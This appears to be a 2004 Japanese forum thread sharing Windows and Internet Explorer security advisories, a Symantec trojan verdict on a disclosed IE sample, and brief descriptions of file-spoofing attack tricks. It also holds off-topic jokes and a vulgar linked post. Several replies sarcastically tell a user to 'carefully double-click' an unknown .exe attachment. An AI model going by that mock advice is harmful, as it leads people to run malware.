[Full-Disclosure] Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part IV
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/full-disclosure/2004.01/msg00011.html
http://www.malware.com/

ファイルを分析しました。
送られたそれぞれのファイルについてわかったことを以下に報告します。
結果: デベロッパーノートを参照してください。
結果:このファイルは次のウィルスに感染しています:
Download.Trojan

デベロッパーノート:
This archive contains malicious code. Any malicious contents will be detected by NAV
if they are extracted from the archive. Please delete this file.
***html is non-repairable threat. NAV with the latest beta definition detects this.
Please delete this file and replace it if neccessary. Please follow the instruction
at the end of this email message to install the latest beta definitions.
This file is contained by ***

***.html will download a Trojan dropper to your system when running.
NAV with the latest beta definition detects this. Please delete this file
and replace it if neccessary. Please follow the instruction at the end of
this email message to install the latest beta definitions.

ご提出いただいたサンプルについて、シマンテック・セキュリティ・レスポンスは
ウイルス、ワームまたはトロイの木馬に感染していると判断いたしました。

（Ｃ）2004 シマンテック・セキュリティ・レスポンス
（Ｐ）2004 シマンテック・セキュリティ・レスポンス

あけましておめでとうございます。
さて、以下のようなニュースが出てますのでご注意を。

Norton AntiVirusで定義ファイルを更新するとMS Officeに不具合
http://japan.cnet.com/news/ent/story/0,2000047623,20063594,00.htm

2004 年 1 月 7 日以降、コンピュータの動作が異常に遅くなり、Microsoft Word や Excel が起動できなくなった
http://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/jp_docid/20040108142217958

マイクロソフト サポート技術情報 - 834374
Windows Update でエラーが発生した場合のエラー番号について
http://support.microsoft.com/default.aspx?scid=kb;ja;834374

マイクロソフト サポート技術情報 - 319011
エラー メッセージ : 次のファイルが存在しないかまたは壊れているため、
Windows 2000 を起動できませんでした: \Winnt\System32\Config\System
http://support.microsoft.com/default.aspx?scid=kb;ja;319011

マイクロソフト サポート技術情報 - 834367
ハイパー スレッディング対応マシンにて修正プログラムをアンインストールすると発生する問題
http://support.microsoft.com/default.aspx?scid=kb;ja;834367

マイクロソフト サポート技術情報 - 823659
セキュリティ設定およびユーザー権利の割り当てを変更すると、クライアント、サービス、
およびプログラムとの互換性がなくなる
http://support.microsoft.com/default.aspx?scid=kb;ja;823659

マイクロソフト サポート技術情報 - 833330
Windows 2000 または Windows XP を実行するコンピュータから Blaster ワームまたは
Nachi ワームを駆除するツールについて
http://support.microsoft.com/default.aspx?scid=kb;ja;833330

IEに2種類の新たなセキュリティ・ホールが見つかる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040110/138152/

（・３・）　またですＹＯ

小5のある日、兄の自転車を借りて坂を下ってたら
実はブレーキがすごく甘くなってて、
ブレーキしてもどんどんスピードが上がっていって
靴のつま先で無理やりブレーキさせても靴が磨り減るだけで
仕方なく路肩の植木に身を投げたら擦り傷いっぱいでスカート破けて
そのままｴﾛﾃｨｯｸな格好で泣きながら家に帰ったら
母がいきなり
「誰にやられたの！」
と聞いて来たのでは私はお兄ちゃんの自転車で…と言うつもりが
泣きじゃくってるせいでうまくいえず
「お…お兄ちゃん…」
と呟いたら母は突然倒れてそのまま気絶してました。

>>918
コピペ

いちいち言わなくても大半のやつはわかるだろ。わからん厨房のほうがわるい。
面白いから好きだけど、この小話。

今月から一人暮らし始めたんですが、なんかおかしなものが見えるんです。

俺の部屋にはユニットバスってのがあるんですが、そこの壁の中に人が住んでるんです。
俺がトイレに行って用を済ませて手を洗おうとすると必ずそいつが出てきて
俺のまねをして手を洗う、そして手を拭くとそいつも手を拭くんです。

初めてそいつに会ったときにお前は誰だと聞いたんですが何かそいつも
同時に何か言おうとしたらしく口をパクパクさせてたからじゃあお前から言えって
言って俺は黙って待ってたんです。そしたらそいつも黙ってるし・・・

で、そんなやりとりが何度かあった後でこっちも我慢できなくなって胸倉を
掴もうとしたんです。そしたらそいつも俺の胸倉を掴もうとするじゃないですか。
俺はそのとき身の危険を感じたんですぐに台所に行って包丁を持ってまた戻ったんです。
もちろん刺したりしませんよ。脅すためです。
そうしたらなんと、そいつも俺と同じように包丁を手に持ってるじゃないですか。

もうこれは本当に危ないと思って俺、そこを飛び出したんです。
こんなとんでもない部屋を紹介した不動産屋に怒鳴り込んでやろうと思ったんですが
部屋に戻らないと電話番号とかわからないし、でも戻ると殺されるかもしれない。
どうすればいいですか？やはり警察に行ったほうがいいんでしょうか？

でも警察は実際に被害がないと動いてくれないって聞いたことがあるので
行っていいものかどうか迷っています。だれかよい知恵を下さい。

>>921
OSとバージョンは?

　　　　　 　 　 　 　 __,,,,,,
　　　　　　　　 ,.-'''"-─ `ー,--─'''''''''''i-､,,
　　　　　　,.-,/　　　　　 　 /::::::::::::::::::::::!,,　　＼
　　　　　（　 ,'　 　 　 　 　 i:::::::::::::::::::::;ﾉ　ヽ-､,,/''ー'''"7
　　　　　　`''|　 　 　 　 　 |:::::::::::::::::::::}　　　　　｀`ー''"
　　　　　　　 !　　　　　　　'､:::::::::::::::::::i
　　　　　　　 '､　`-=''''フ'ー''ヽ、::::::::::/ヽ､-─-､,,-'''ヽ　
　　　　　　　　 ＼＿／　　　　 ヽ--く　　 _,,,..--┴-､ ヽ
　　　　　　　　　　　　　　　　　　　　　｀`"　　　　　　＼>

まんこ
http://2.csx.jp/~koukichi/tada.html

ZDNet UK - News - Windows 98 gets support reprieve
http://news.zdnet.co.uk/0,39020330,39119028,00.htm

Microsoft has extended support for Windows 98, Windows 98 SE and Windows ME.
The software giant has extended support for the operating systems until 30 June, 2006.

98/98SE/MEのサポート期間が延長されるとの報道です。
まだ更新されてはおりませんがMS公式のサポート期間は以下のサイトで検索することができます。
http://www.microsoft.com/japan/windows/lifecycle/default.mspx

>>925
日本語情報は
http://www.itmedia.co.jp/news/articles/0401/13/news069.html

MDAC 機能のバッファ オーバーランにより、コードが実行される (832483) (MS04-003)
http://www.microsoft.com/japan/technet/security/bulletin/ms04-003.asp
このセキュリティ情報の対象となるユーザー : MicrosoftR WindowsR を使用しているお客様
脆弱性の影響 : リモートでコードが実行される
最大深刻度 : 重要
推奨する対応策 : お客様は、修正プログラムをできるだけ早期にインストールしてください。

Exchange Server 2003 の脆弱性により、権限が昇格する (832759) (MS04-002)
http://www.microsoft.com/japan/technet/security/bulletin/ms04-002.asp
このセキュリティ情報の対象となるユーザー : Outlook Web Access for Microsoft
Exchange Server 2003 を実行しているサーバーを使用しているシステム管理者
脆弱性の影響 : 権限の昇格
最大深刻度 : 警告
推奨する対応策 :
システム管理者はこのセキュリティ修正プログラムを Outlook Web Access for
Microsoft Exchange Server 2003 を実行しているすべてのフロントエンドサーバーに
インストールして下さい。また、バックエンド サーバーをフロントエンドサーバーのロールに
移行する場合を考慮して、このセキュリティ修正プログラムを Exchange Server 2003 を
実行しているすべてのコンピュータにインストールすることを推奨します。

Microsoft Internet Security and Acceleration Server 2000 H.323 フィルタの脆弱性により、
リモートでコードが実行される (816458) (MS04-001)
http://www.microsoft.com/japan/technet/security/bulletin/MS04-001.asp
このセキュリティ情報の対象となるユーザー : Microsoft Internet Security and Acceleration
Server 2000 をご使用のお客様
脆弱性の影響 : リモートでコードが実行される
最大深刻度 : 緊急
推奨する対応策 : お客様は、セキュリティ修正プログラムを直ちにインストールしてください。
※この件に関してはCERT Advisoryが出てます。
CERTR Advisory CA-2004-01 Multiple H.323 Message Vulnerabilities
http://www.cert.org/advisories/CA-2004-01.html

http://www.st.ryukoku.ac.jp/~kjm/security/memo/

[Full-Disclosure] Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part IV
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/full-disclosure/2004.01/msg00011.html
Download.Trojan [Symantec]
http://www.symantec.com/region/jp/sarcj/data/d/download.trojan.html
　
PivXのThor Larholm 氏が反論
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2004.01/msg00014.html

IEに2種類の新たなセキュリティ・ホールが見つかる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040110/138152/
http://archives.neohapsis.com/archives/bugtraq/2003-12/0337.html
http://www.secunia.com/advisories/10523
http://archives.neohapsis.com/archives/bugtraq/2004-01/0002.html
http://www.safecenter.net/UMBRELLAWEBV4/ie_unpatched/
http://www.nai.com/japan/security/virE2003.asp?v=Exploit-URLSpoof

９８の今後について
http://ime.nu/ime.nu/sd-7.net/cgi-bin/free/wforum.cgi?no=1707&reno=1699&oya=1696&mode=msgview&page=0

　

>>921
それは鏡だよ。

本文のないメールが来て、そこの添付ファイルがありました。
そのファイルは
vbLf.exe
htmlbanner[1].html
というのがあります。
添付ファイルは実行してません。
これってウィルスですか？
ウィルスだったらメールを削除するだけでいいんでしょうか？

それだけでは何とも判断できませんな。

添付ファイルを注意深くダブルクリックしプロパティを表示して、
その内容をここに貼ってみてください。

スレ違いかもしれませんが、どこで聞いたらいいのかわからないので
よろしくお願いします。
ヤフーメッセンジャーを起動するたびに、
「許可しますか？」というのが表示されているので
邪魔だなと思い、誤って「いいえ」をクリックして
「その状態を記憶する（保存する？）」にしてしまったところ
ヤフーメッセンジャーにログインできなくなりました。
私のミスなんですが、どうしたら解除できるんでしょうか？
アンインストールの後にインストールし直しましたが無理でした。
どなたかアドバイスよろしくお願いします。

>>934
PC初心者
http://pc2.2ch.net/pcqa/

or

夢・独り言
http://life.2ch.net/yume/

>>933
知らない差出人からのメールに添付されてる「.exe」は実行するな、
と聞いたことがあった気がするのですぐ削除しました。
一応なんともないので大丈夫だと思います。

いえ、注意深くダブルクリックすれば大丈夫ですよ。

今回は残念でしたが、また同じようなものが送られてきた時には
細心の注意をはらって、慎重にダブルクリックしてください。

>>937
はい、注意深くダブルクリックすればいいんですね？ｗ
わかりました〜
これからは注意深くダブルクリックしてみますｗ

貴重なアドバイスありがとうございました

↑
参考になりました。

>いえ、注意深くダブルクリックすれば大丈夫ですよ。
注意深いﾀﾞﾌﾞﾙｸﾘｸってどんなのよ?

心を込めた優しいタッチで軽くダブルクリックすることだと
パソコン教室の先生が教えてくれました

周囲の人たちにみつからないようにこっそりとダブルクリックすることだと
先輩がいってました。

ぱふぱふ　と、押すのじゃ。

内側にねじり混むようにして打つべし！打つべし！打つべし！

ほ

リモートからコマンドを実行できるWindowsの“仕様”を発見
http://itpro.nikkeibp.co.jp/free/NBY/NEWS/20040130/139143/

.∧∧
(,,ﾟДﾟ)< 仕様がないＯＳだこと。
|O旦O
.∪∪

やっぱりバックドアがあったか＞窓

MS04-004 : Internet Explorer の重要な更新
Internet Explorer 用の累積的なセキュリティ修正プログラム (832894)

ttp://www.microsoft.com/japan/security/security_bulletins/MS04-004e.asp

だそうだ。

俺、IEなんて使ってないんだけどなぁ…

>>948
今やってるが、おっそろしく重いわけだが・・

マイクロソフトは、高いWindowsServerを無料で使えるのに、サイトはLinuxに依存。

http://www.netcraft.com/?host=microsoft&position=limited&lookup=Search

「What's that site running?]」をクリックして確認して下さい。
世界中のマイクロソフトは、表向きmicrosoft.comだけWindowsServer使っていますが、
実際はLinux依存なのですよ。もう騙されないぞ！

米Microsoftは、自社ウェブサイトを攻撃者から守るために、Linuxを使っている。
http://japan.cnet.com/news/ent/story/0,2000047623,20060667,00.htm

Windowsではとても持ちません。Windows無料で使えるマイクロソフトでさえ使いませんｗ

Win98seでIE5.5使ってるが
このままで大丈夫なんだよな？

>>948
児童ダウンでそのウプデータンｷﾀｰ
MS04-004 : Internet Explorer の重要な更新
Internet Explorer 用の累積的なセキュリティ修正プログラム (832894)

月刊WinUpまた臨時増刊かよ

>>948
これあてたマシン、ネットにつながらなくなっちゃったよＴＴ

>>960
ネット環境は何よ？

どうしてこう穴だらけなんだ、ＭＳの製品は！
と、今更言っても詮無いことか。トホホ・・・。

>>949
Windows95でもない限り、パッチは当てとけ

>>948
ttp://support.microsoft.com/default.aspx?scid=http://www.microsoft.com/japan/support/sokuho/default.asp#Record_94
注意。

ISDN

次スレある？

ニュース板でやる必要ある？

単発質問やネタスレよりも全然やる意義があるだろう。

下と比べないと存在意義がないスレだな

IEの最新パッチ--「問題は直っていない」と一部ユーザーから報告
http://japan.cnet.com/news/ent/story/0,2000047623,20064145,00.htm

XPそろそろLonghornに替わるんでしょうに、また欠陥OSだったってことか。
次も期待出来ん　Mac買うぞ!!　ぼけMS。

>>966
MacよりLinux

【総合】スパイウェア予防駆除関連ソフトPart1
http://pc.2ch.net/test/read.cgi/sec/1064493726/

これをここに統合したらどうかという案がいきなり浮上してきました。
よかですか？

>>967
LinuxよりShidax

ShidaxよりPentax

つうか仕事の大半がプレーンテキストの操作な立場だと、UNIX系の環境が一番快適。
漏れはFreeBSDを使ってるけどな。（MacOS10は軽く弄ったが、吐き気がしたので止めた）

excelで報告書を仕上げるのが仕事な人は、WindowsかMacしか選択肢無いだろうけど。

>>971
*Linux/*BSD上でOOorgでも良いのでは？
殆どの人はVBAなんて使っていないだろうし。

すんません、出張してました。まとめて行きます。

■ 「フォルダ」に見せかけ任意のファイルを実行――Windows XPを狙う手口に警告
(ITmedia, 2004.01.28)
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2004/01.html#20040129_folder
概要：Windows XP は、.folder 拡張子がついているとフォルダとして表示する
(.folder 拡張子のファイルにはフォルダアイコンを表示する)
ダブルクリック時にどのように処理するかは、動的に決定する
(中身が HTML のようなら HTML として処理する)
ことを利用し、フォルダのように見えるアイコンをダブルクリックすると悪意ある
プログラムの実行によって攻撃される。

■ Internet Explorer File Download Extension Spoofing
(secunia.com, 2004.01.28)
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2004/01.html#20040130_IEfilespoof
IE 6 に欠陥。ファイル名に CLSID を埋め込むことにより、IE がファイルを「開く」場合に、
本来開かれるべきアプリケーションではなく、CLSID に示されるアプリケーションが起動されてしまう。